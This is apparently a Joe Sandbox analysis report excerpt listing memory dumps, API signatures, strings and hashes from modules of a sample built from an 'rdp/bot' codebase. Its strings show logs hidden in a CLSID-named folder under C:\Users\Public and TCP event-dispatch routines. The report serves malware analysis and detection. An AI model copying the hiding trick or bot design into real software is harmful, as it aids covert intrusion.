    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
    • API String ID: 513531256-2729875187
    • Opcode ID: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
    • Instruction ID: 331f7ba6cc26a9b60c45bbaac6f03a49b64eb4456062d19f5c30327131bd19bc
    • Opcode Fuzzy Hash: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
    • Instruction Fuzzy Hash: 7C41B131A0CE4186FB209BA3EC543BB6398FB857A4F8450B5DA4D477B6EF2CE5418700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
    • API String ID: 513531256-2601447032
    • Opcode ID: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
    • Instruction ID: 755df28770a11242a1c4dbff40cb9c1ac55f5f244fed5c69711d22be7a28fc14
    • Opcode Fuzzy Hash: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
    • Instruction Fuzzy Hash: FA414C62A0878286F730EF55E8507BAA662FB88780F444035DA8D877B6CF3DE585CF00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: _errno
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
    • API String ID: 2918714741-1670302297
    • Opcode ID: 0819a08ac9b92502f3effe13010cc7f0f2bae6465a415d33977b83b8dfe9e95d
    • Instruction ID: 680188718f69fa7894fe5a03c2de82120e45b67a3ee994be2905b43570c8c443
    • Opcode Fuzzy Hash: 0819a08ac9b92502f3effe13010cc7f0f2bae6465a415d33977b83b8dfe9e95d
    • Instruction Fuzzy Hash: 36217462A08E8A96E751DF16ED407AA7360BB447A4F544072EE8C476F4DFBCD946CB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: CopyErrorFileLastfflushfwrite
    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
    • API String ID: 2887799713-3464183404
    • Opcode ID: d98a879003f8920cd60626ca8283fd755b391b7f9df6f109e05a144c0ec80fb7
    • Instruction ID: fbc60374954bef494b3db8f2fb75144c4c55df59e6a9d37be70a069a7a6aa2ef
    • Opcode Fuzzy Hash: d98a879003f8920cd60626ca8283fd755b391b7f9df6f109e05a144c0ec80fb7
    • Instruction Fuzzy Hash: 1D415F9391C61A87FA244705E41C379676C7F01B8CF540A32D90FE6692EE5EAE81B70F
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: DeleteErrorFileLast
    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
    • API String ID: 2018770650-4119452840
    • Opcode ID: 0c4f82b62b480a7ccf0ce0eee53dcb185a613733df67b982af0f8108502a8f1c
    • Instruction ID: 0248b42ff4b6c6f002bf8d1f375997d9d5f5814710e92c07ea01443295e29911
    • Opcode Fuzzy Hash: 0c4f82b62b480a7ccf0ce0eee53dcb185a613733df67b982af0f8108502a8f1c
    • Instruction Fuzzy Hash: 3931F867E1C24B83FB205714A4487B8234A5F5179CF650832D91EEB2A2ED1FAD85B30B
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastsend
    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
    • API String ID: 1802528911-690514478
    • Opcode ID: c4431af1e5df0fa1b77c0167f00e213902285fb8cfeb12510ea4d688c219d3ff
    • Instruction ID: a86b31c862eb9b10c6c61a2ab56b3ce1225a5186a3e39c7a96604e201f607202
    • Opcode Fuzzy Hash: c4431af1e5df0fa1b77c0167f00e213902285fb8cfeb12510ea4d688c219d3ff
    • Instruction Fuzzy Hash: 4F21CD95A18D028DEA204727A8906BC5642AF347F8F5403F1EC7EA6AF1CE2DE585C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastsend
    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
    • API String ID: 1802528911-690514478
    • Opcode ID: 15b751ea6208828088c8f0ee388e070401a8990f51b1c680e837da1f38e52d34
    • Instruction ID: 50bedd23927d5e8b04852e787876cb11896491f41d7c2fada0d81f57a77e952b
    • Opcode Fuzzy Hash: 15b751ea6208828088c8f0ee388e070401a8990f51b1c680e837da1f38e52d34
    • Instruction Fuzzy Hash: 3F219D51A18D5A82EB208B27AD806B82251BF09BF4F6403F1DCBC4B6F1DEECA9458300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
    • API String ID: 1729277954-887953274
    • Opcode ID: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
    • Instruction ID: 8f48afe1bfa5f1f553bbda23c0384543a22f3364902f7a8775322e66add4eac3
    • Opcode Fuzzy Hash: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
    • Instruction Fuzzy Hash: DD116671A1C9428EE3109F17E800469A661EFA8764F5043B5E97E93BB4DF7CD549CB08
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
    • API String ID: 1729277954-887953274
    • Opcode ID: 5702d38517544a50c4c02efa5825983acf8dc3702a8c150c31956d51619f44c6
    • Instruction ID: 240587347c078143e3b7c542f3a497062630bff60808da730e012d75fde6069a
    • Opcode Fuzzy Hash: 5702d38517544a50c4c02efa5825983acf8dc3702a8c150c31956d51619f44c6
    • Instruction Fuzzy Hash: 001198F1A0864286F3509B65E4000BA7661EF99B54F104237EAEE837B5DF7CD549CB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
    • API String ID: 1729277954-887953274
    • Opcode ID: 4f5fd4287e3ef39b3fcfa2f0e810fdcce5893b80189dde7939da0662194752ee
    • Instruction ID: 753fc924b9d2803761041cecdcf279a44f6807cb3cd03e2044b26b61d2e99541
    • Opcode Fuzzy Hash: 4f5fd4287e3ef39b3fcfa2f0e810fdcce5893b80189dde7939da0662194752ee
    • Instruction Fuzzy Hash: 71113371A0898687FB109B27AC405A96661EF88764F1042B5EA6D83AF4DFFCD5098B04
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
    • API String ID: 1729277954-887953274
    • Opcode ID: 575de45d349c3f6f667e40ae284f2e333394407968df57914051907b86ec02ac
    • Instruction ID: 1076c58167df66f215bfc679d418a511d38f46f70ef1083de84ae20e25541909
    • Opcode Fuzzy Hash: 575de45d349c3f6f667e40ae284f2e333394407968df57914051907b86ec02ac
    • Instruction Fuzzy Hash: 8A11E670A1C98286F7509B9BEC041B7A664FF88764F505271E9AD83BB0DF7CD5098B00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
    • API String ID: 1729277954-887953274
    • Opcode ID: 49f31cd4da74999420230ca8a8ff8b08bdaa7f01c0cbf558f8163d08e4928a6f
    • Instruction ID: 0cc4eccc723d7fa85d4e41b0652a138d726e339d186a9343917bef0694ef82fc
    • Opcode Fuzzy Hash: 49f31cd4da74999420230ca8a8ff8b08bdaa7f01c0cbf558f8163d08e4928a6f
    • Instruction Fuzzy Hash: 8E119471A0C5425AE7209B15E8444B9A660FF88B54F504337E9EE83BB5DFBCD54ACB40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: ErrorLastsetsockopt
    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
    • API String ID: 1729277954-887953274
    • Opcode ID: 70116b330ae133e6db921763260f41b65b598ba8a05af3ae692cbf4006f79180
    • Instruction ID: c1e350207d901aa50374f23931420241089d8899bb61d99f3cf424fc11c5bc9e
    • Opcode Fuzzy Hash: 70116b330ae133e6db921763260f41b65b598ba8a05af3ae692cbf4006f79180
    • Instruction Fuzzy Hash: E81163B2B1865286E330AF19E400575A6A0EF88794F105231EAED937F4DF7CD5468F00
    APIs
    Strings
    • routine_tx, xrefs: 00007FFE133834B7
    • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE133834BE
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CriticalSection$EnterHeapLeave$FreeProcess
    • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
    • API String ID: 2539320189-3555278722
    • Opcode ID: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
    • Instruction ID: b73aa33aae018fc9f76bc7bb0fea2da36d13da1c794b810ed8ca31a1ddee9118
    • Opcode Fuzzy Hash: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
    • Instruction Fuzzy Hash: 09310D35A08E02CAEA259F13E88017D7761EF64BB0F5441B6CA6E67B74CF3CE5858348
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Sleep
    • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
    • API String ID: 3472027048-1600310168
    • Opcode ID: 7e3ad2c1e4ac073133c4f7497bcf4b2d96363eed15d8fae15b10b4d1402a2ac6
    • Instruction ID: 0bfbcca630899748d44a4bf54343f08e69aa803b26c9a2b29536f3e0d05de6e9
    • Opcode Fuzzy Hash: 7e3ad2c1e4ac073133c4f7497bcf4b2d96363eed15d8fae15b10b4d1402a2ac6
    • Instruction Fuzzy Hash: 0E513A21E1CE4F86FA308B27AC503B96251AF94378F6042B1D8AD466F9DEEDF8458740
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: AttributesErrorFileLast
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
    • API String ID: 1799206407-4111913120
    • Opcode ID: e575ce4ff6468a7c1a66abed08b257aa28eec3b6b3dac7ce41bb0a83748ca758
    • Instruction ID: 5c2963500265fe6c254c679b72d2595948b34b2441f9f5ef6d06ffd5cdc0b2b3
    • Opcode Fuzzy Hash: e575ce4ff6468a7c1a66abed08b257aa28eec3b6b3dac7ce41bb0a83748ca758
    • Instruction Fuzzy Hash: 1921B558E0DD8FC3FB744A5ABC543B912409F1037AFB085B2D08ECA9F0DEDCA8859642
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: AttributesErrorFileLast
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
    • API String ID: 1799206407-4111913120
    • Opcode ID: 169187e13bf94e9e73ddb397f1f9595109a157e87271d41c4efa3b22c4cadb2c
    • Instruction ID: 8db0a3d01ddb741a1eb14746dfa8a1ebc938fd9e29cae1a8fbd0c04163d44b83
    • Opcode Fuzzy Hash: 169187e13bf94e9e73ddb397f1f9595109a157e87271d41c4efa3b22c4cadb2c
    • Instruction Fuzzy Hash: 0B21A4D1E0DA8782FB785E98A58437E5150DF01309F604532F68ECA1F5CE6CED85AE4A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: AttributesErrorFileLast
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
    • API String ID: 1799206407-4111913120
    • Opcode ID: ea079b3803748673d39faf23f7dd07e03a78055bc1dc2658456f28d9101e6ad3
    • Instruction ID: ad6b978fba39b0c72315146f918efd4c1872bd8eaa03fe1ecc9e412794749127
    • Opcode Fuzzy Hash: ea079b3803748673d39faf23f7dd07e03a78055bc1dc2658456f28d9101e6ad3
    • Instruction Fuzzy Hash: A721D552E1E49783FB214658E488379536A5F40309FA14932E00EEA5E2CE1FEC85F24B
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
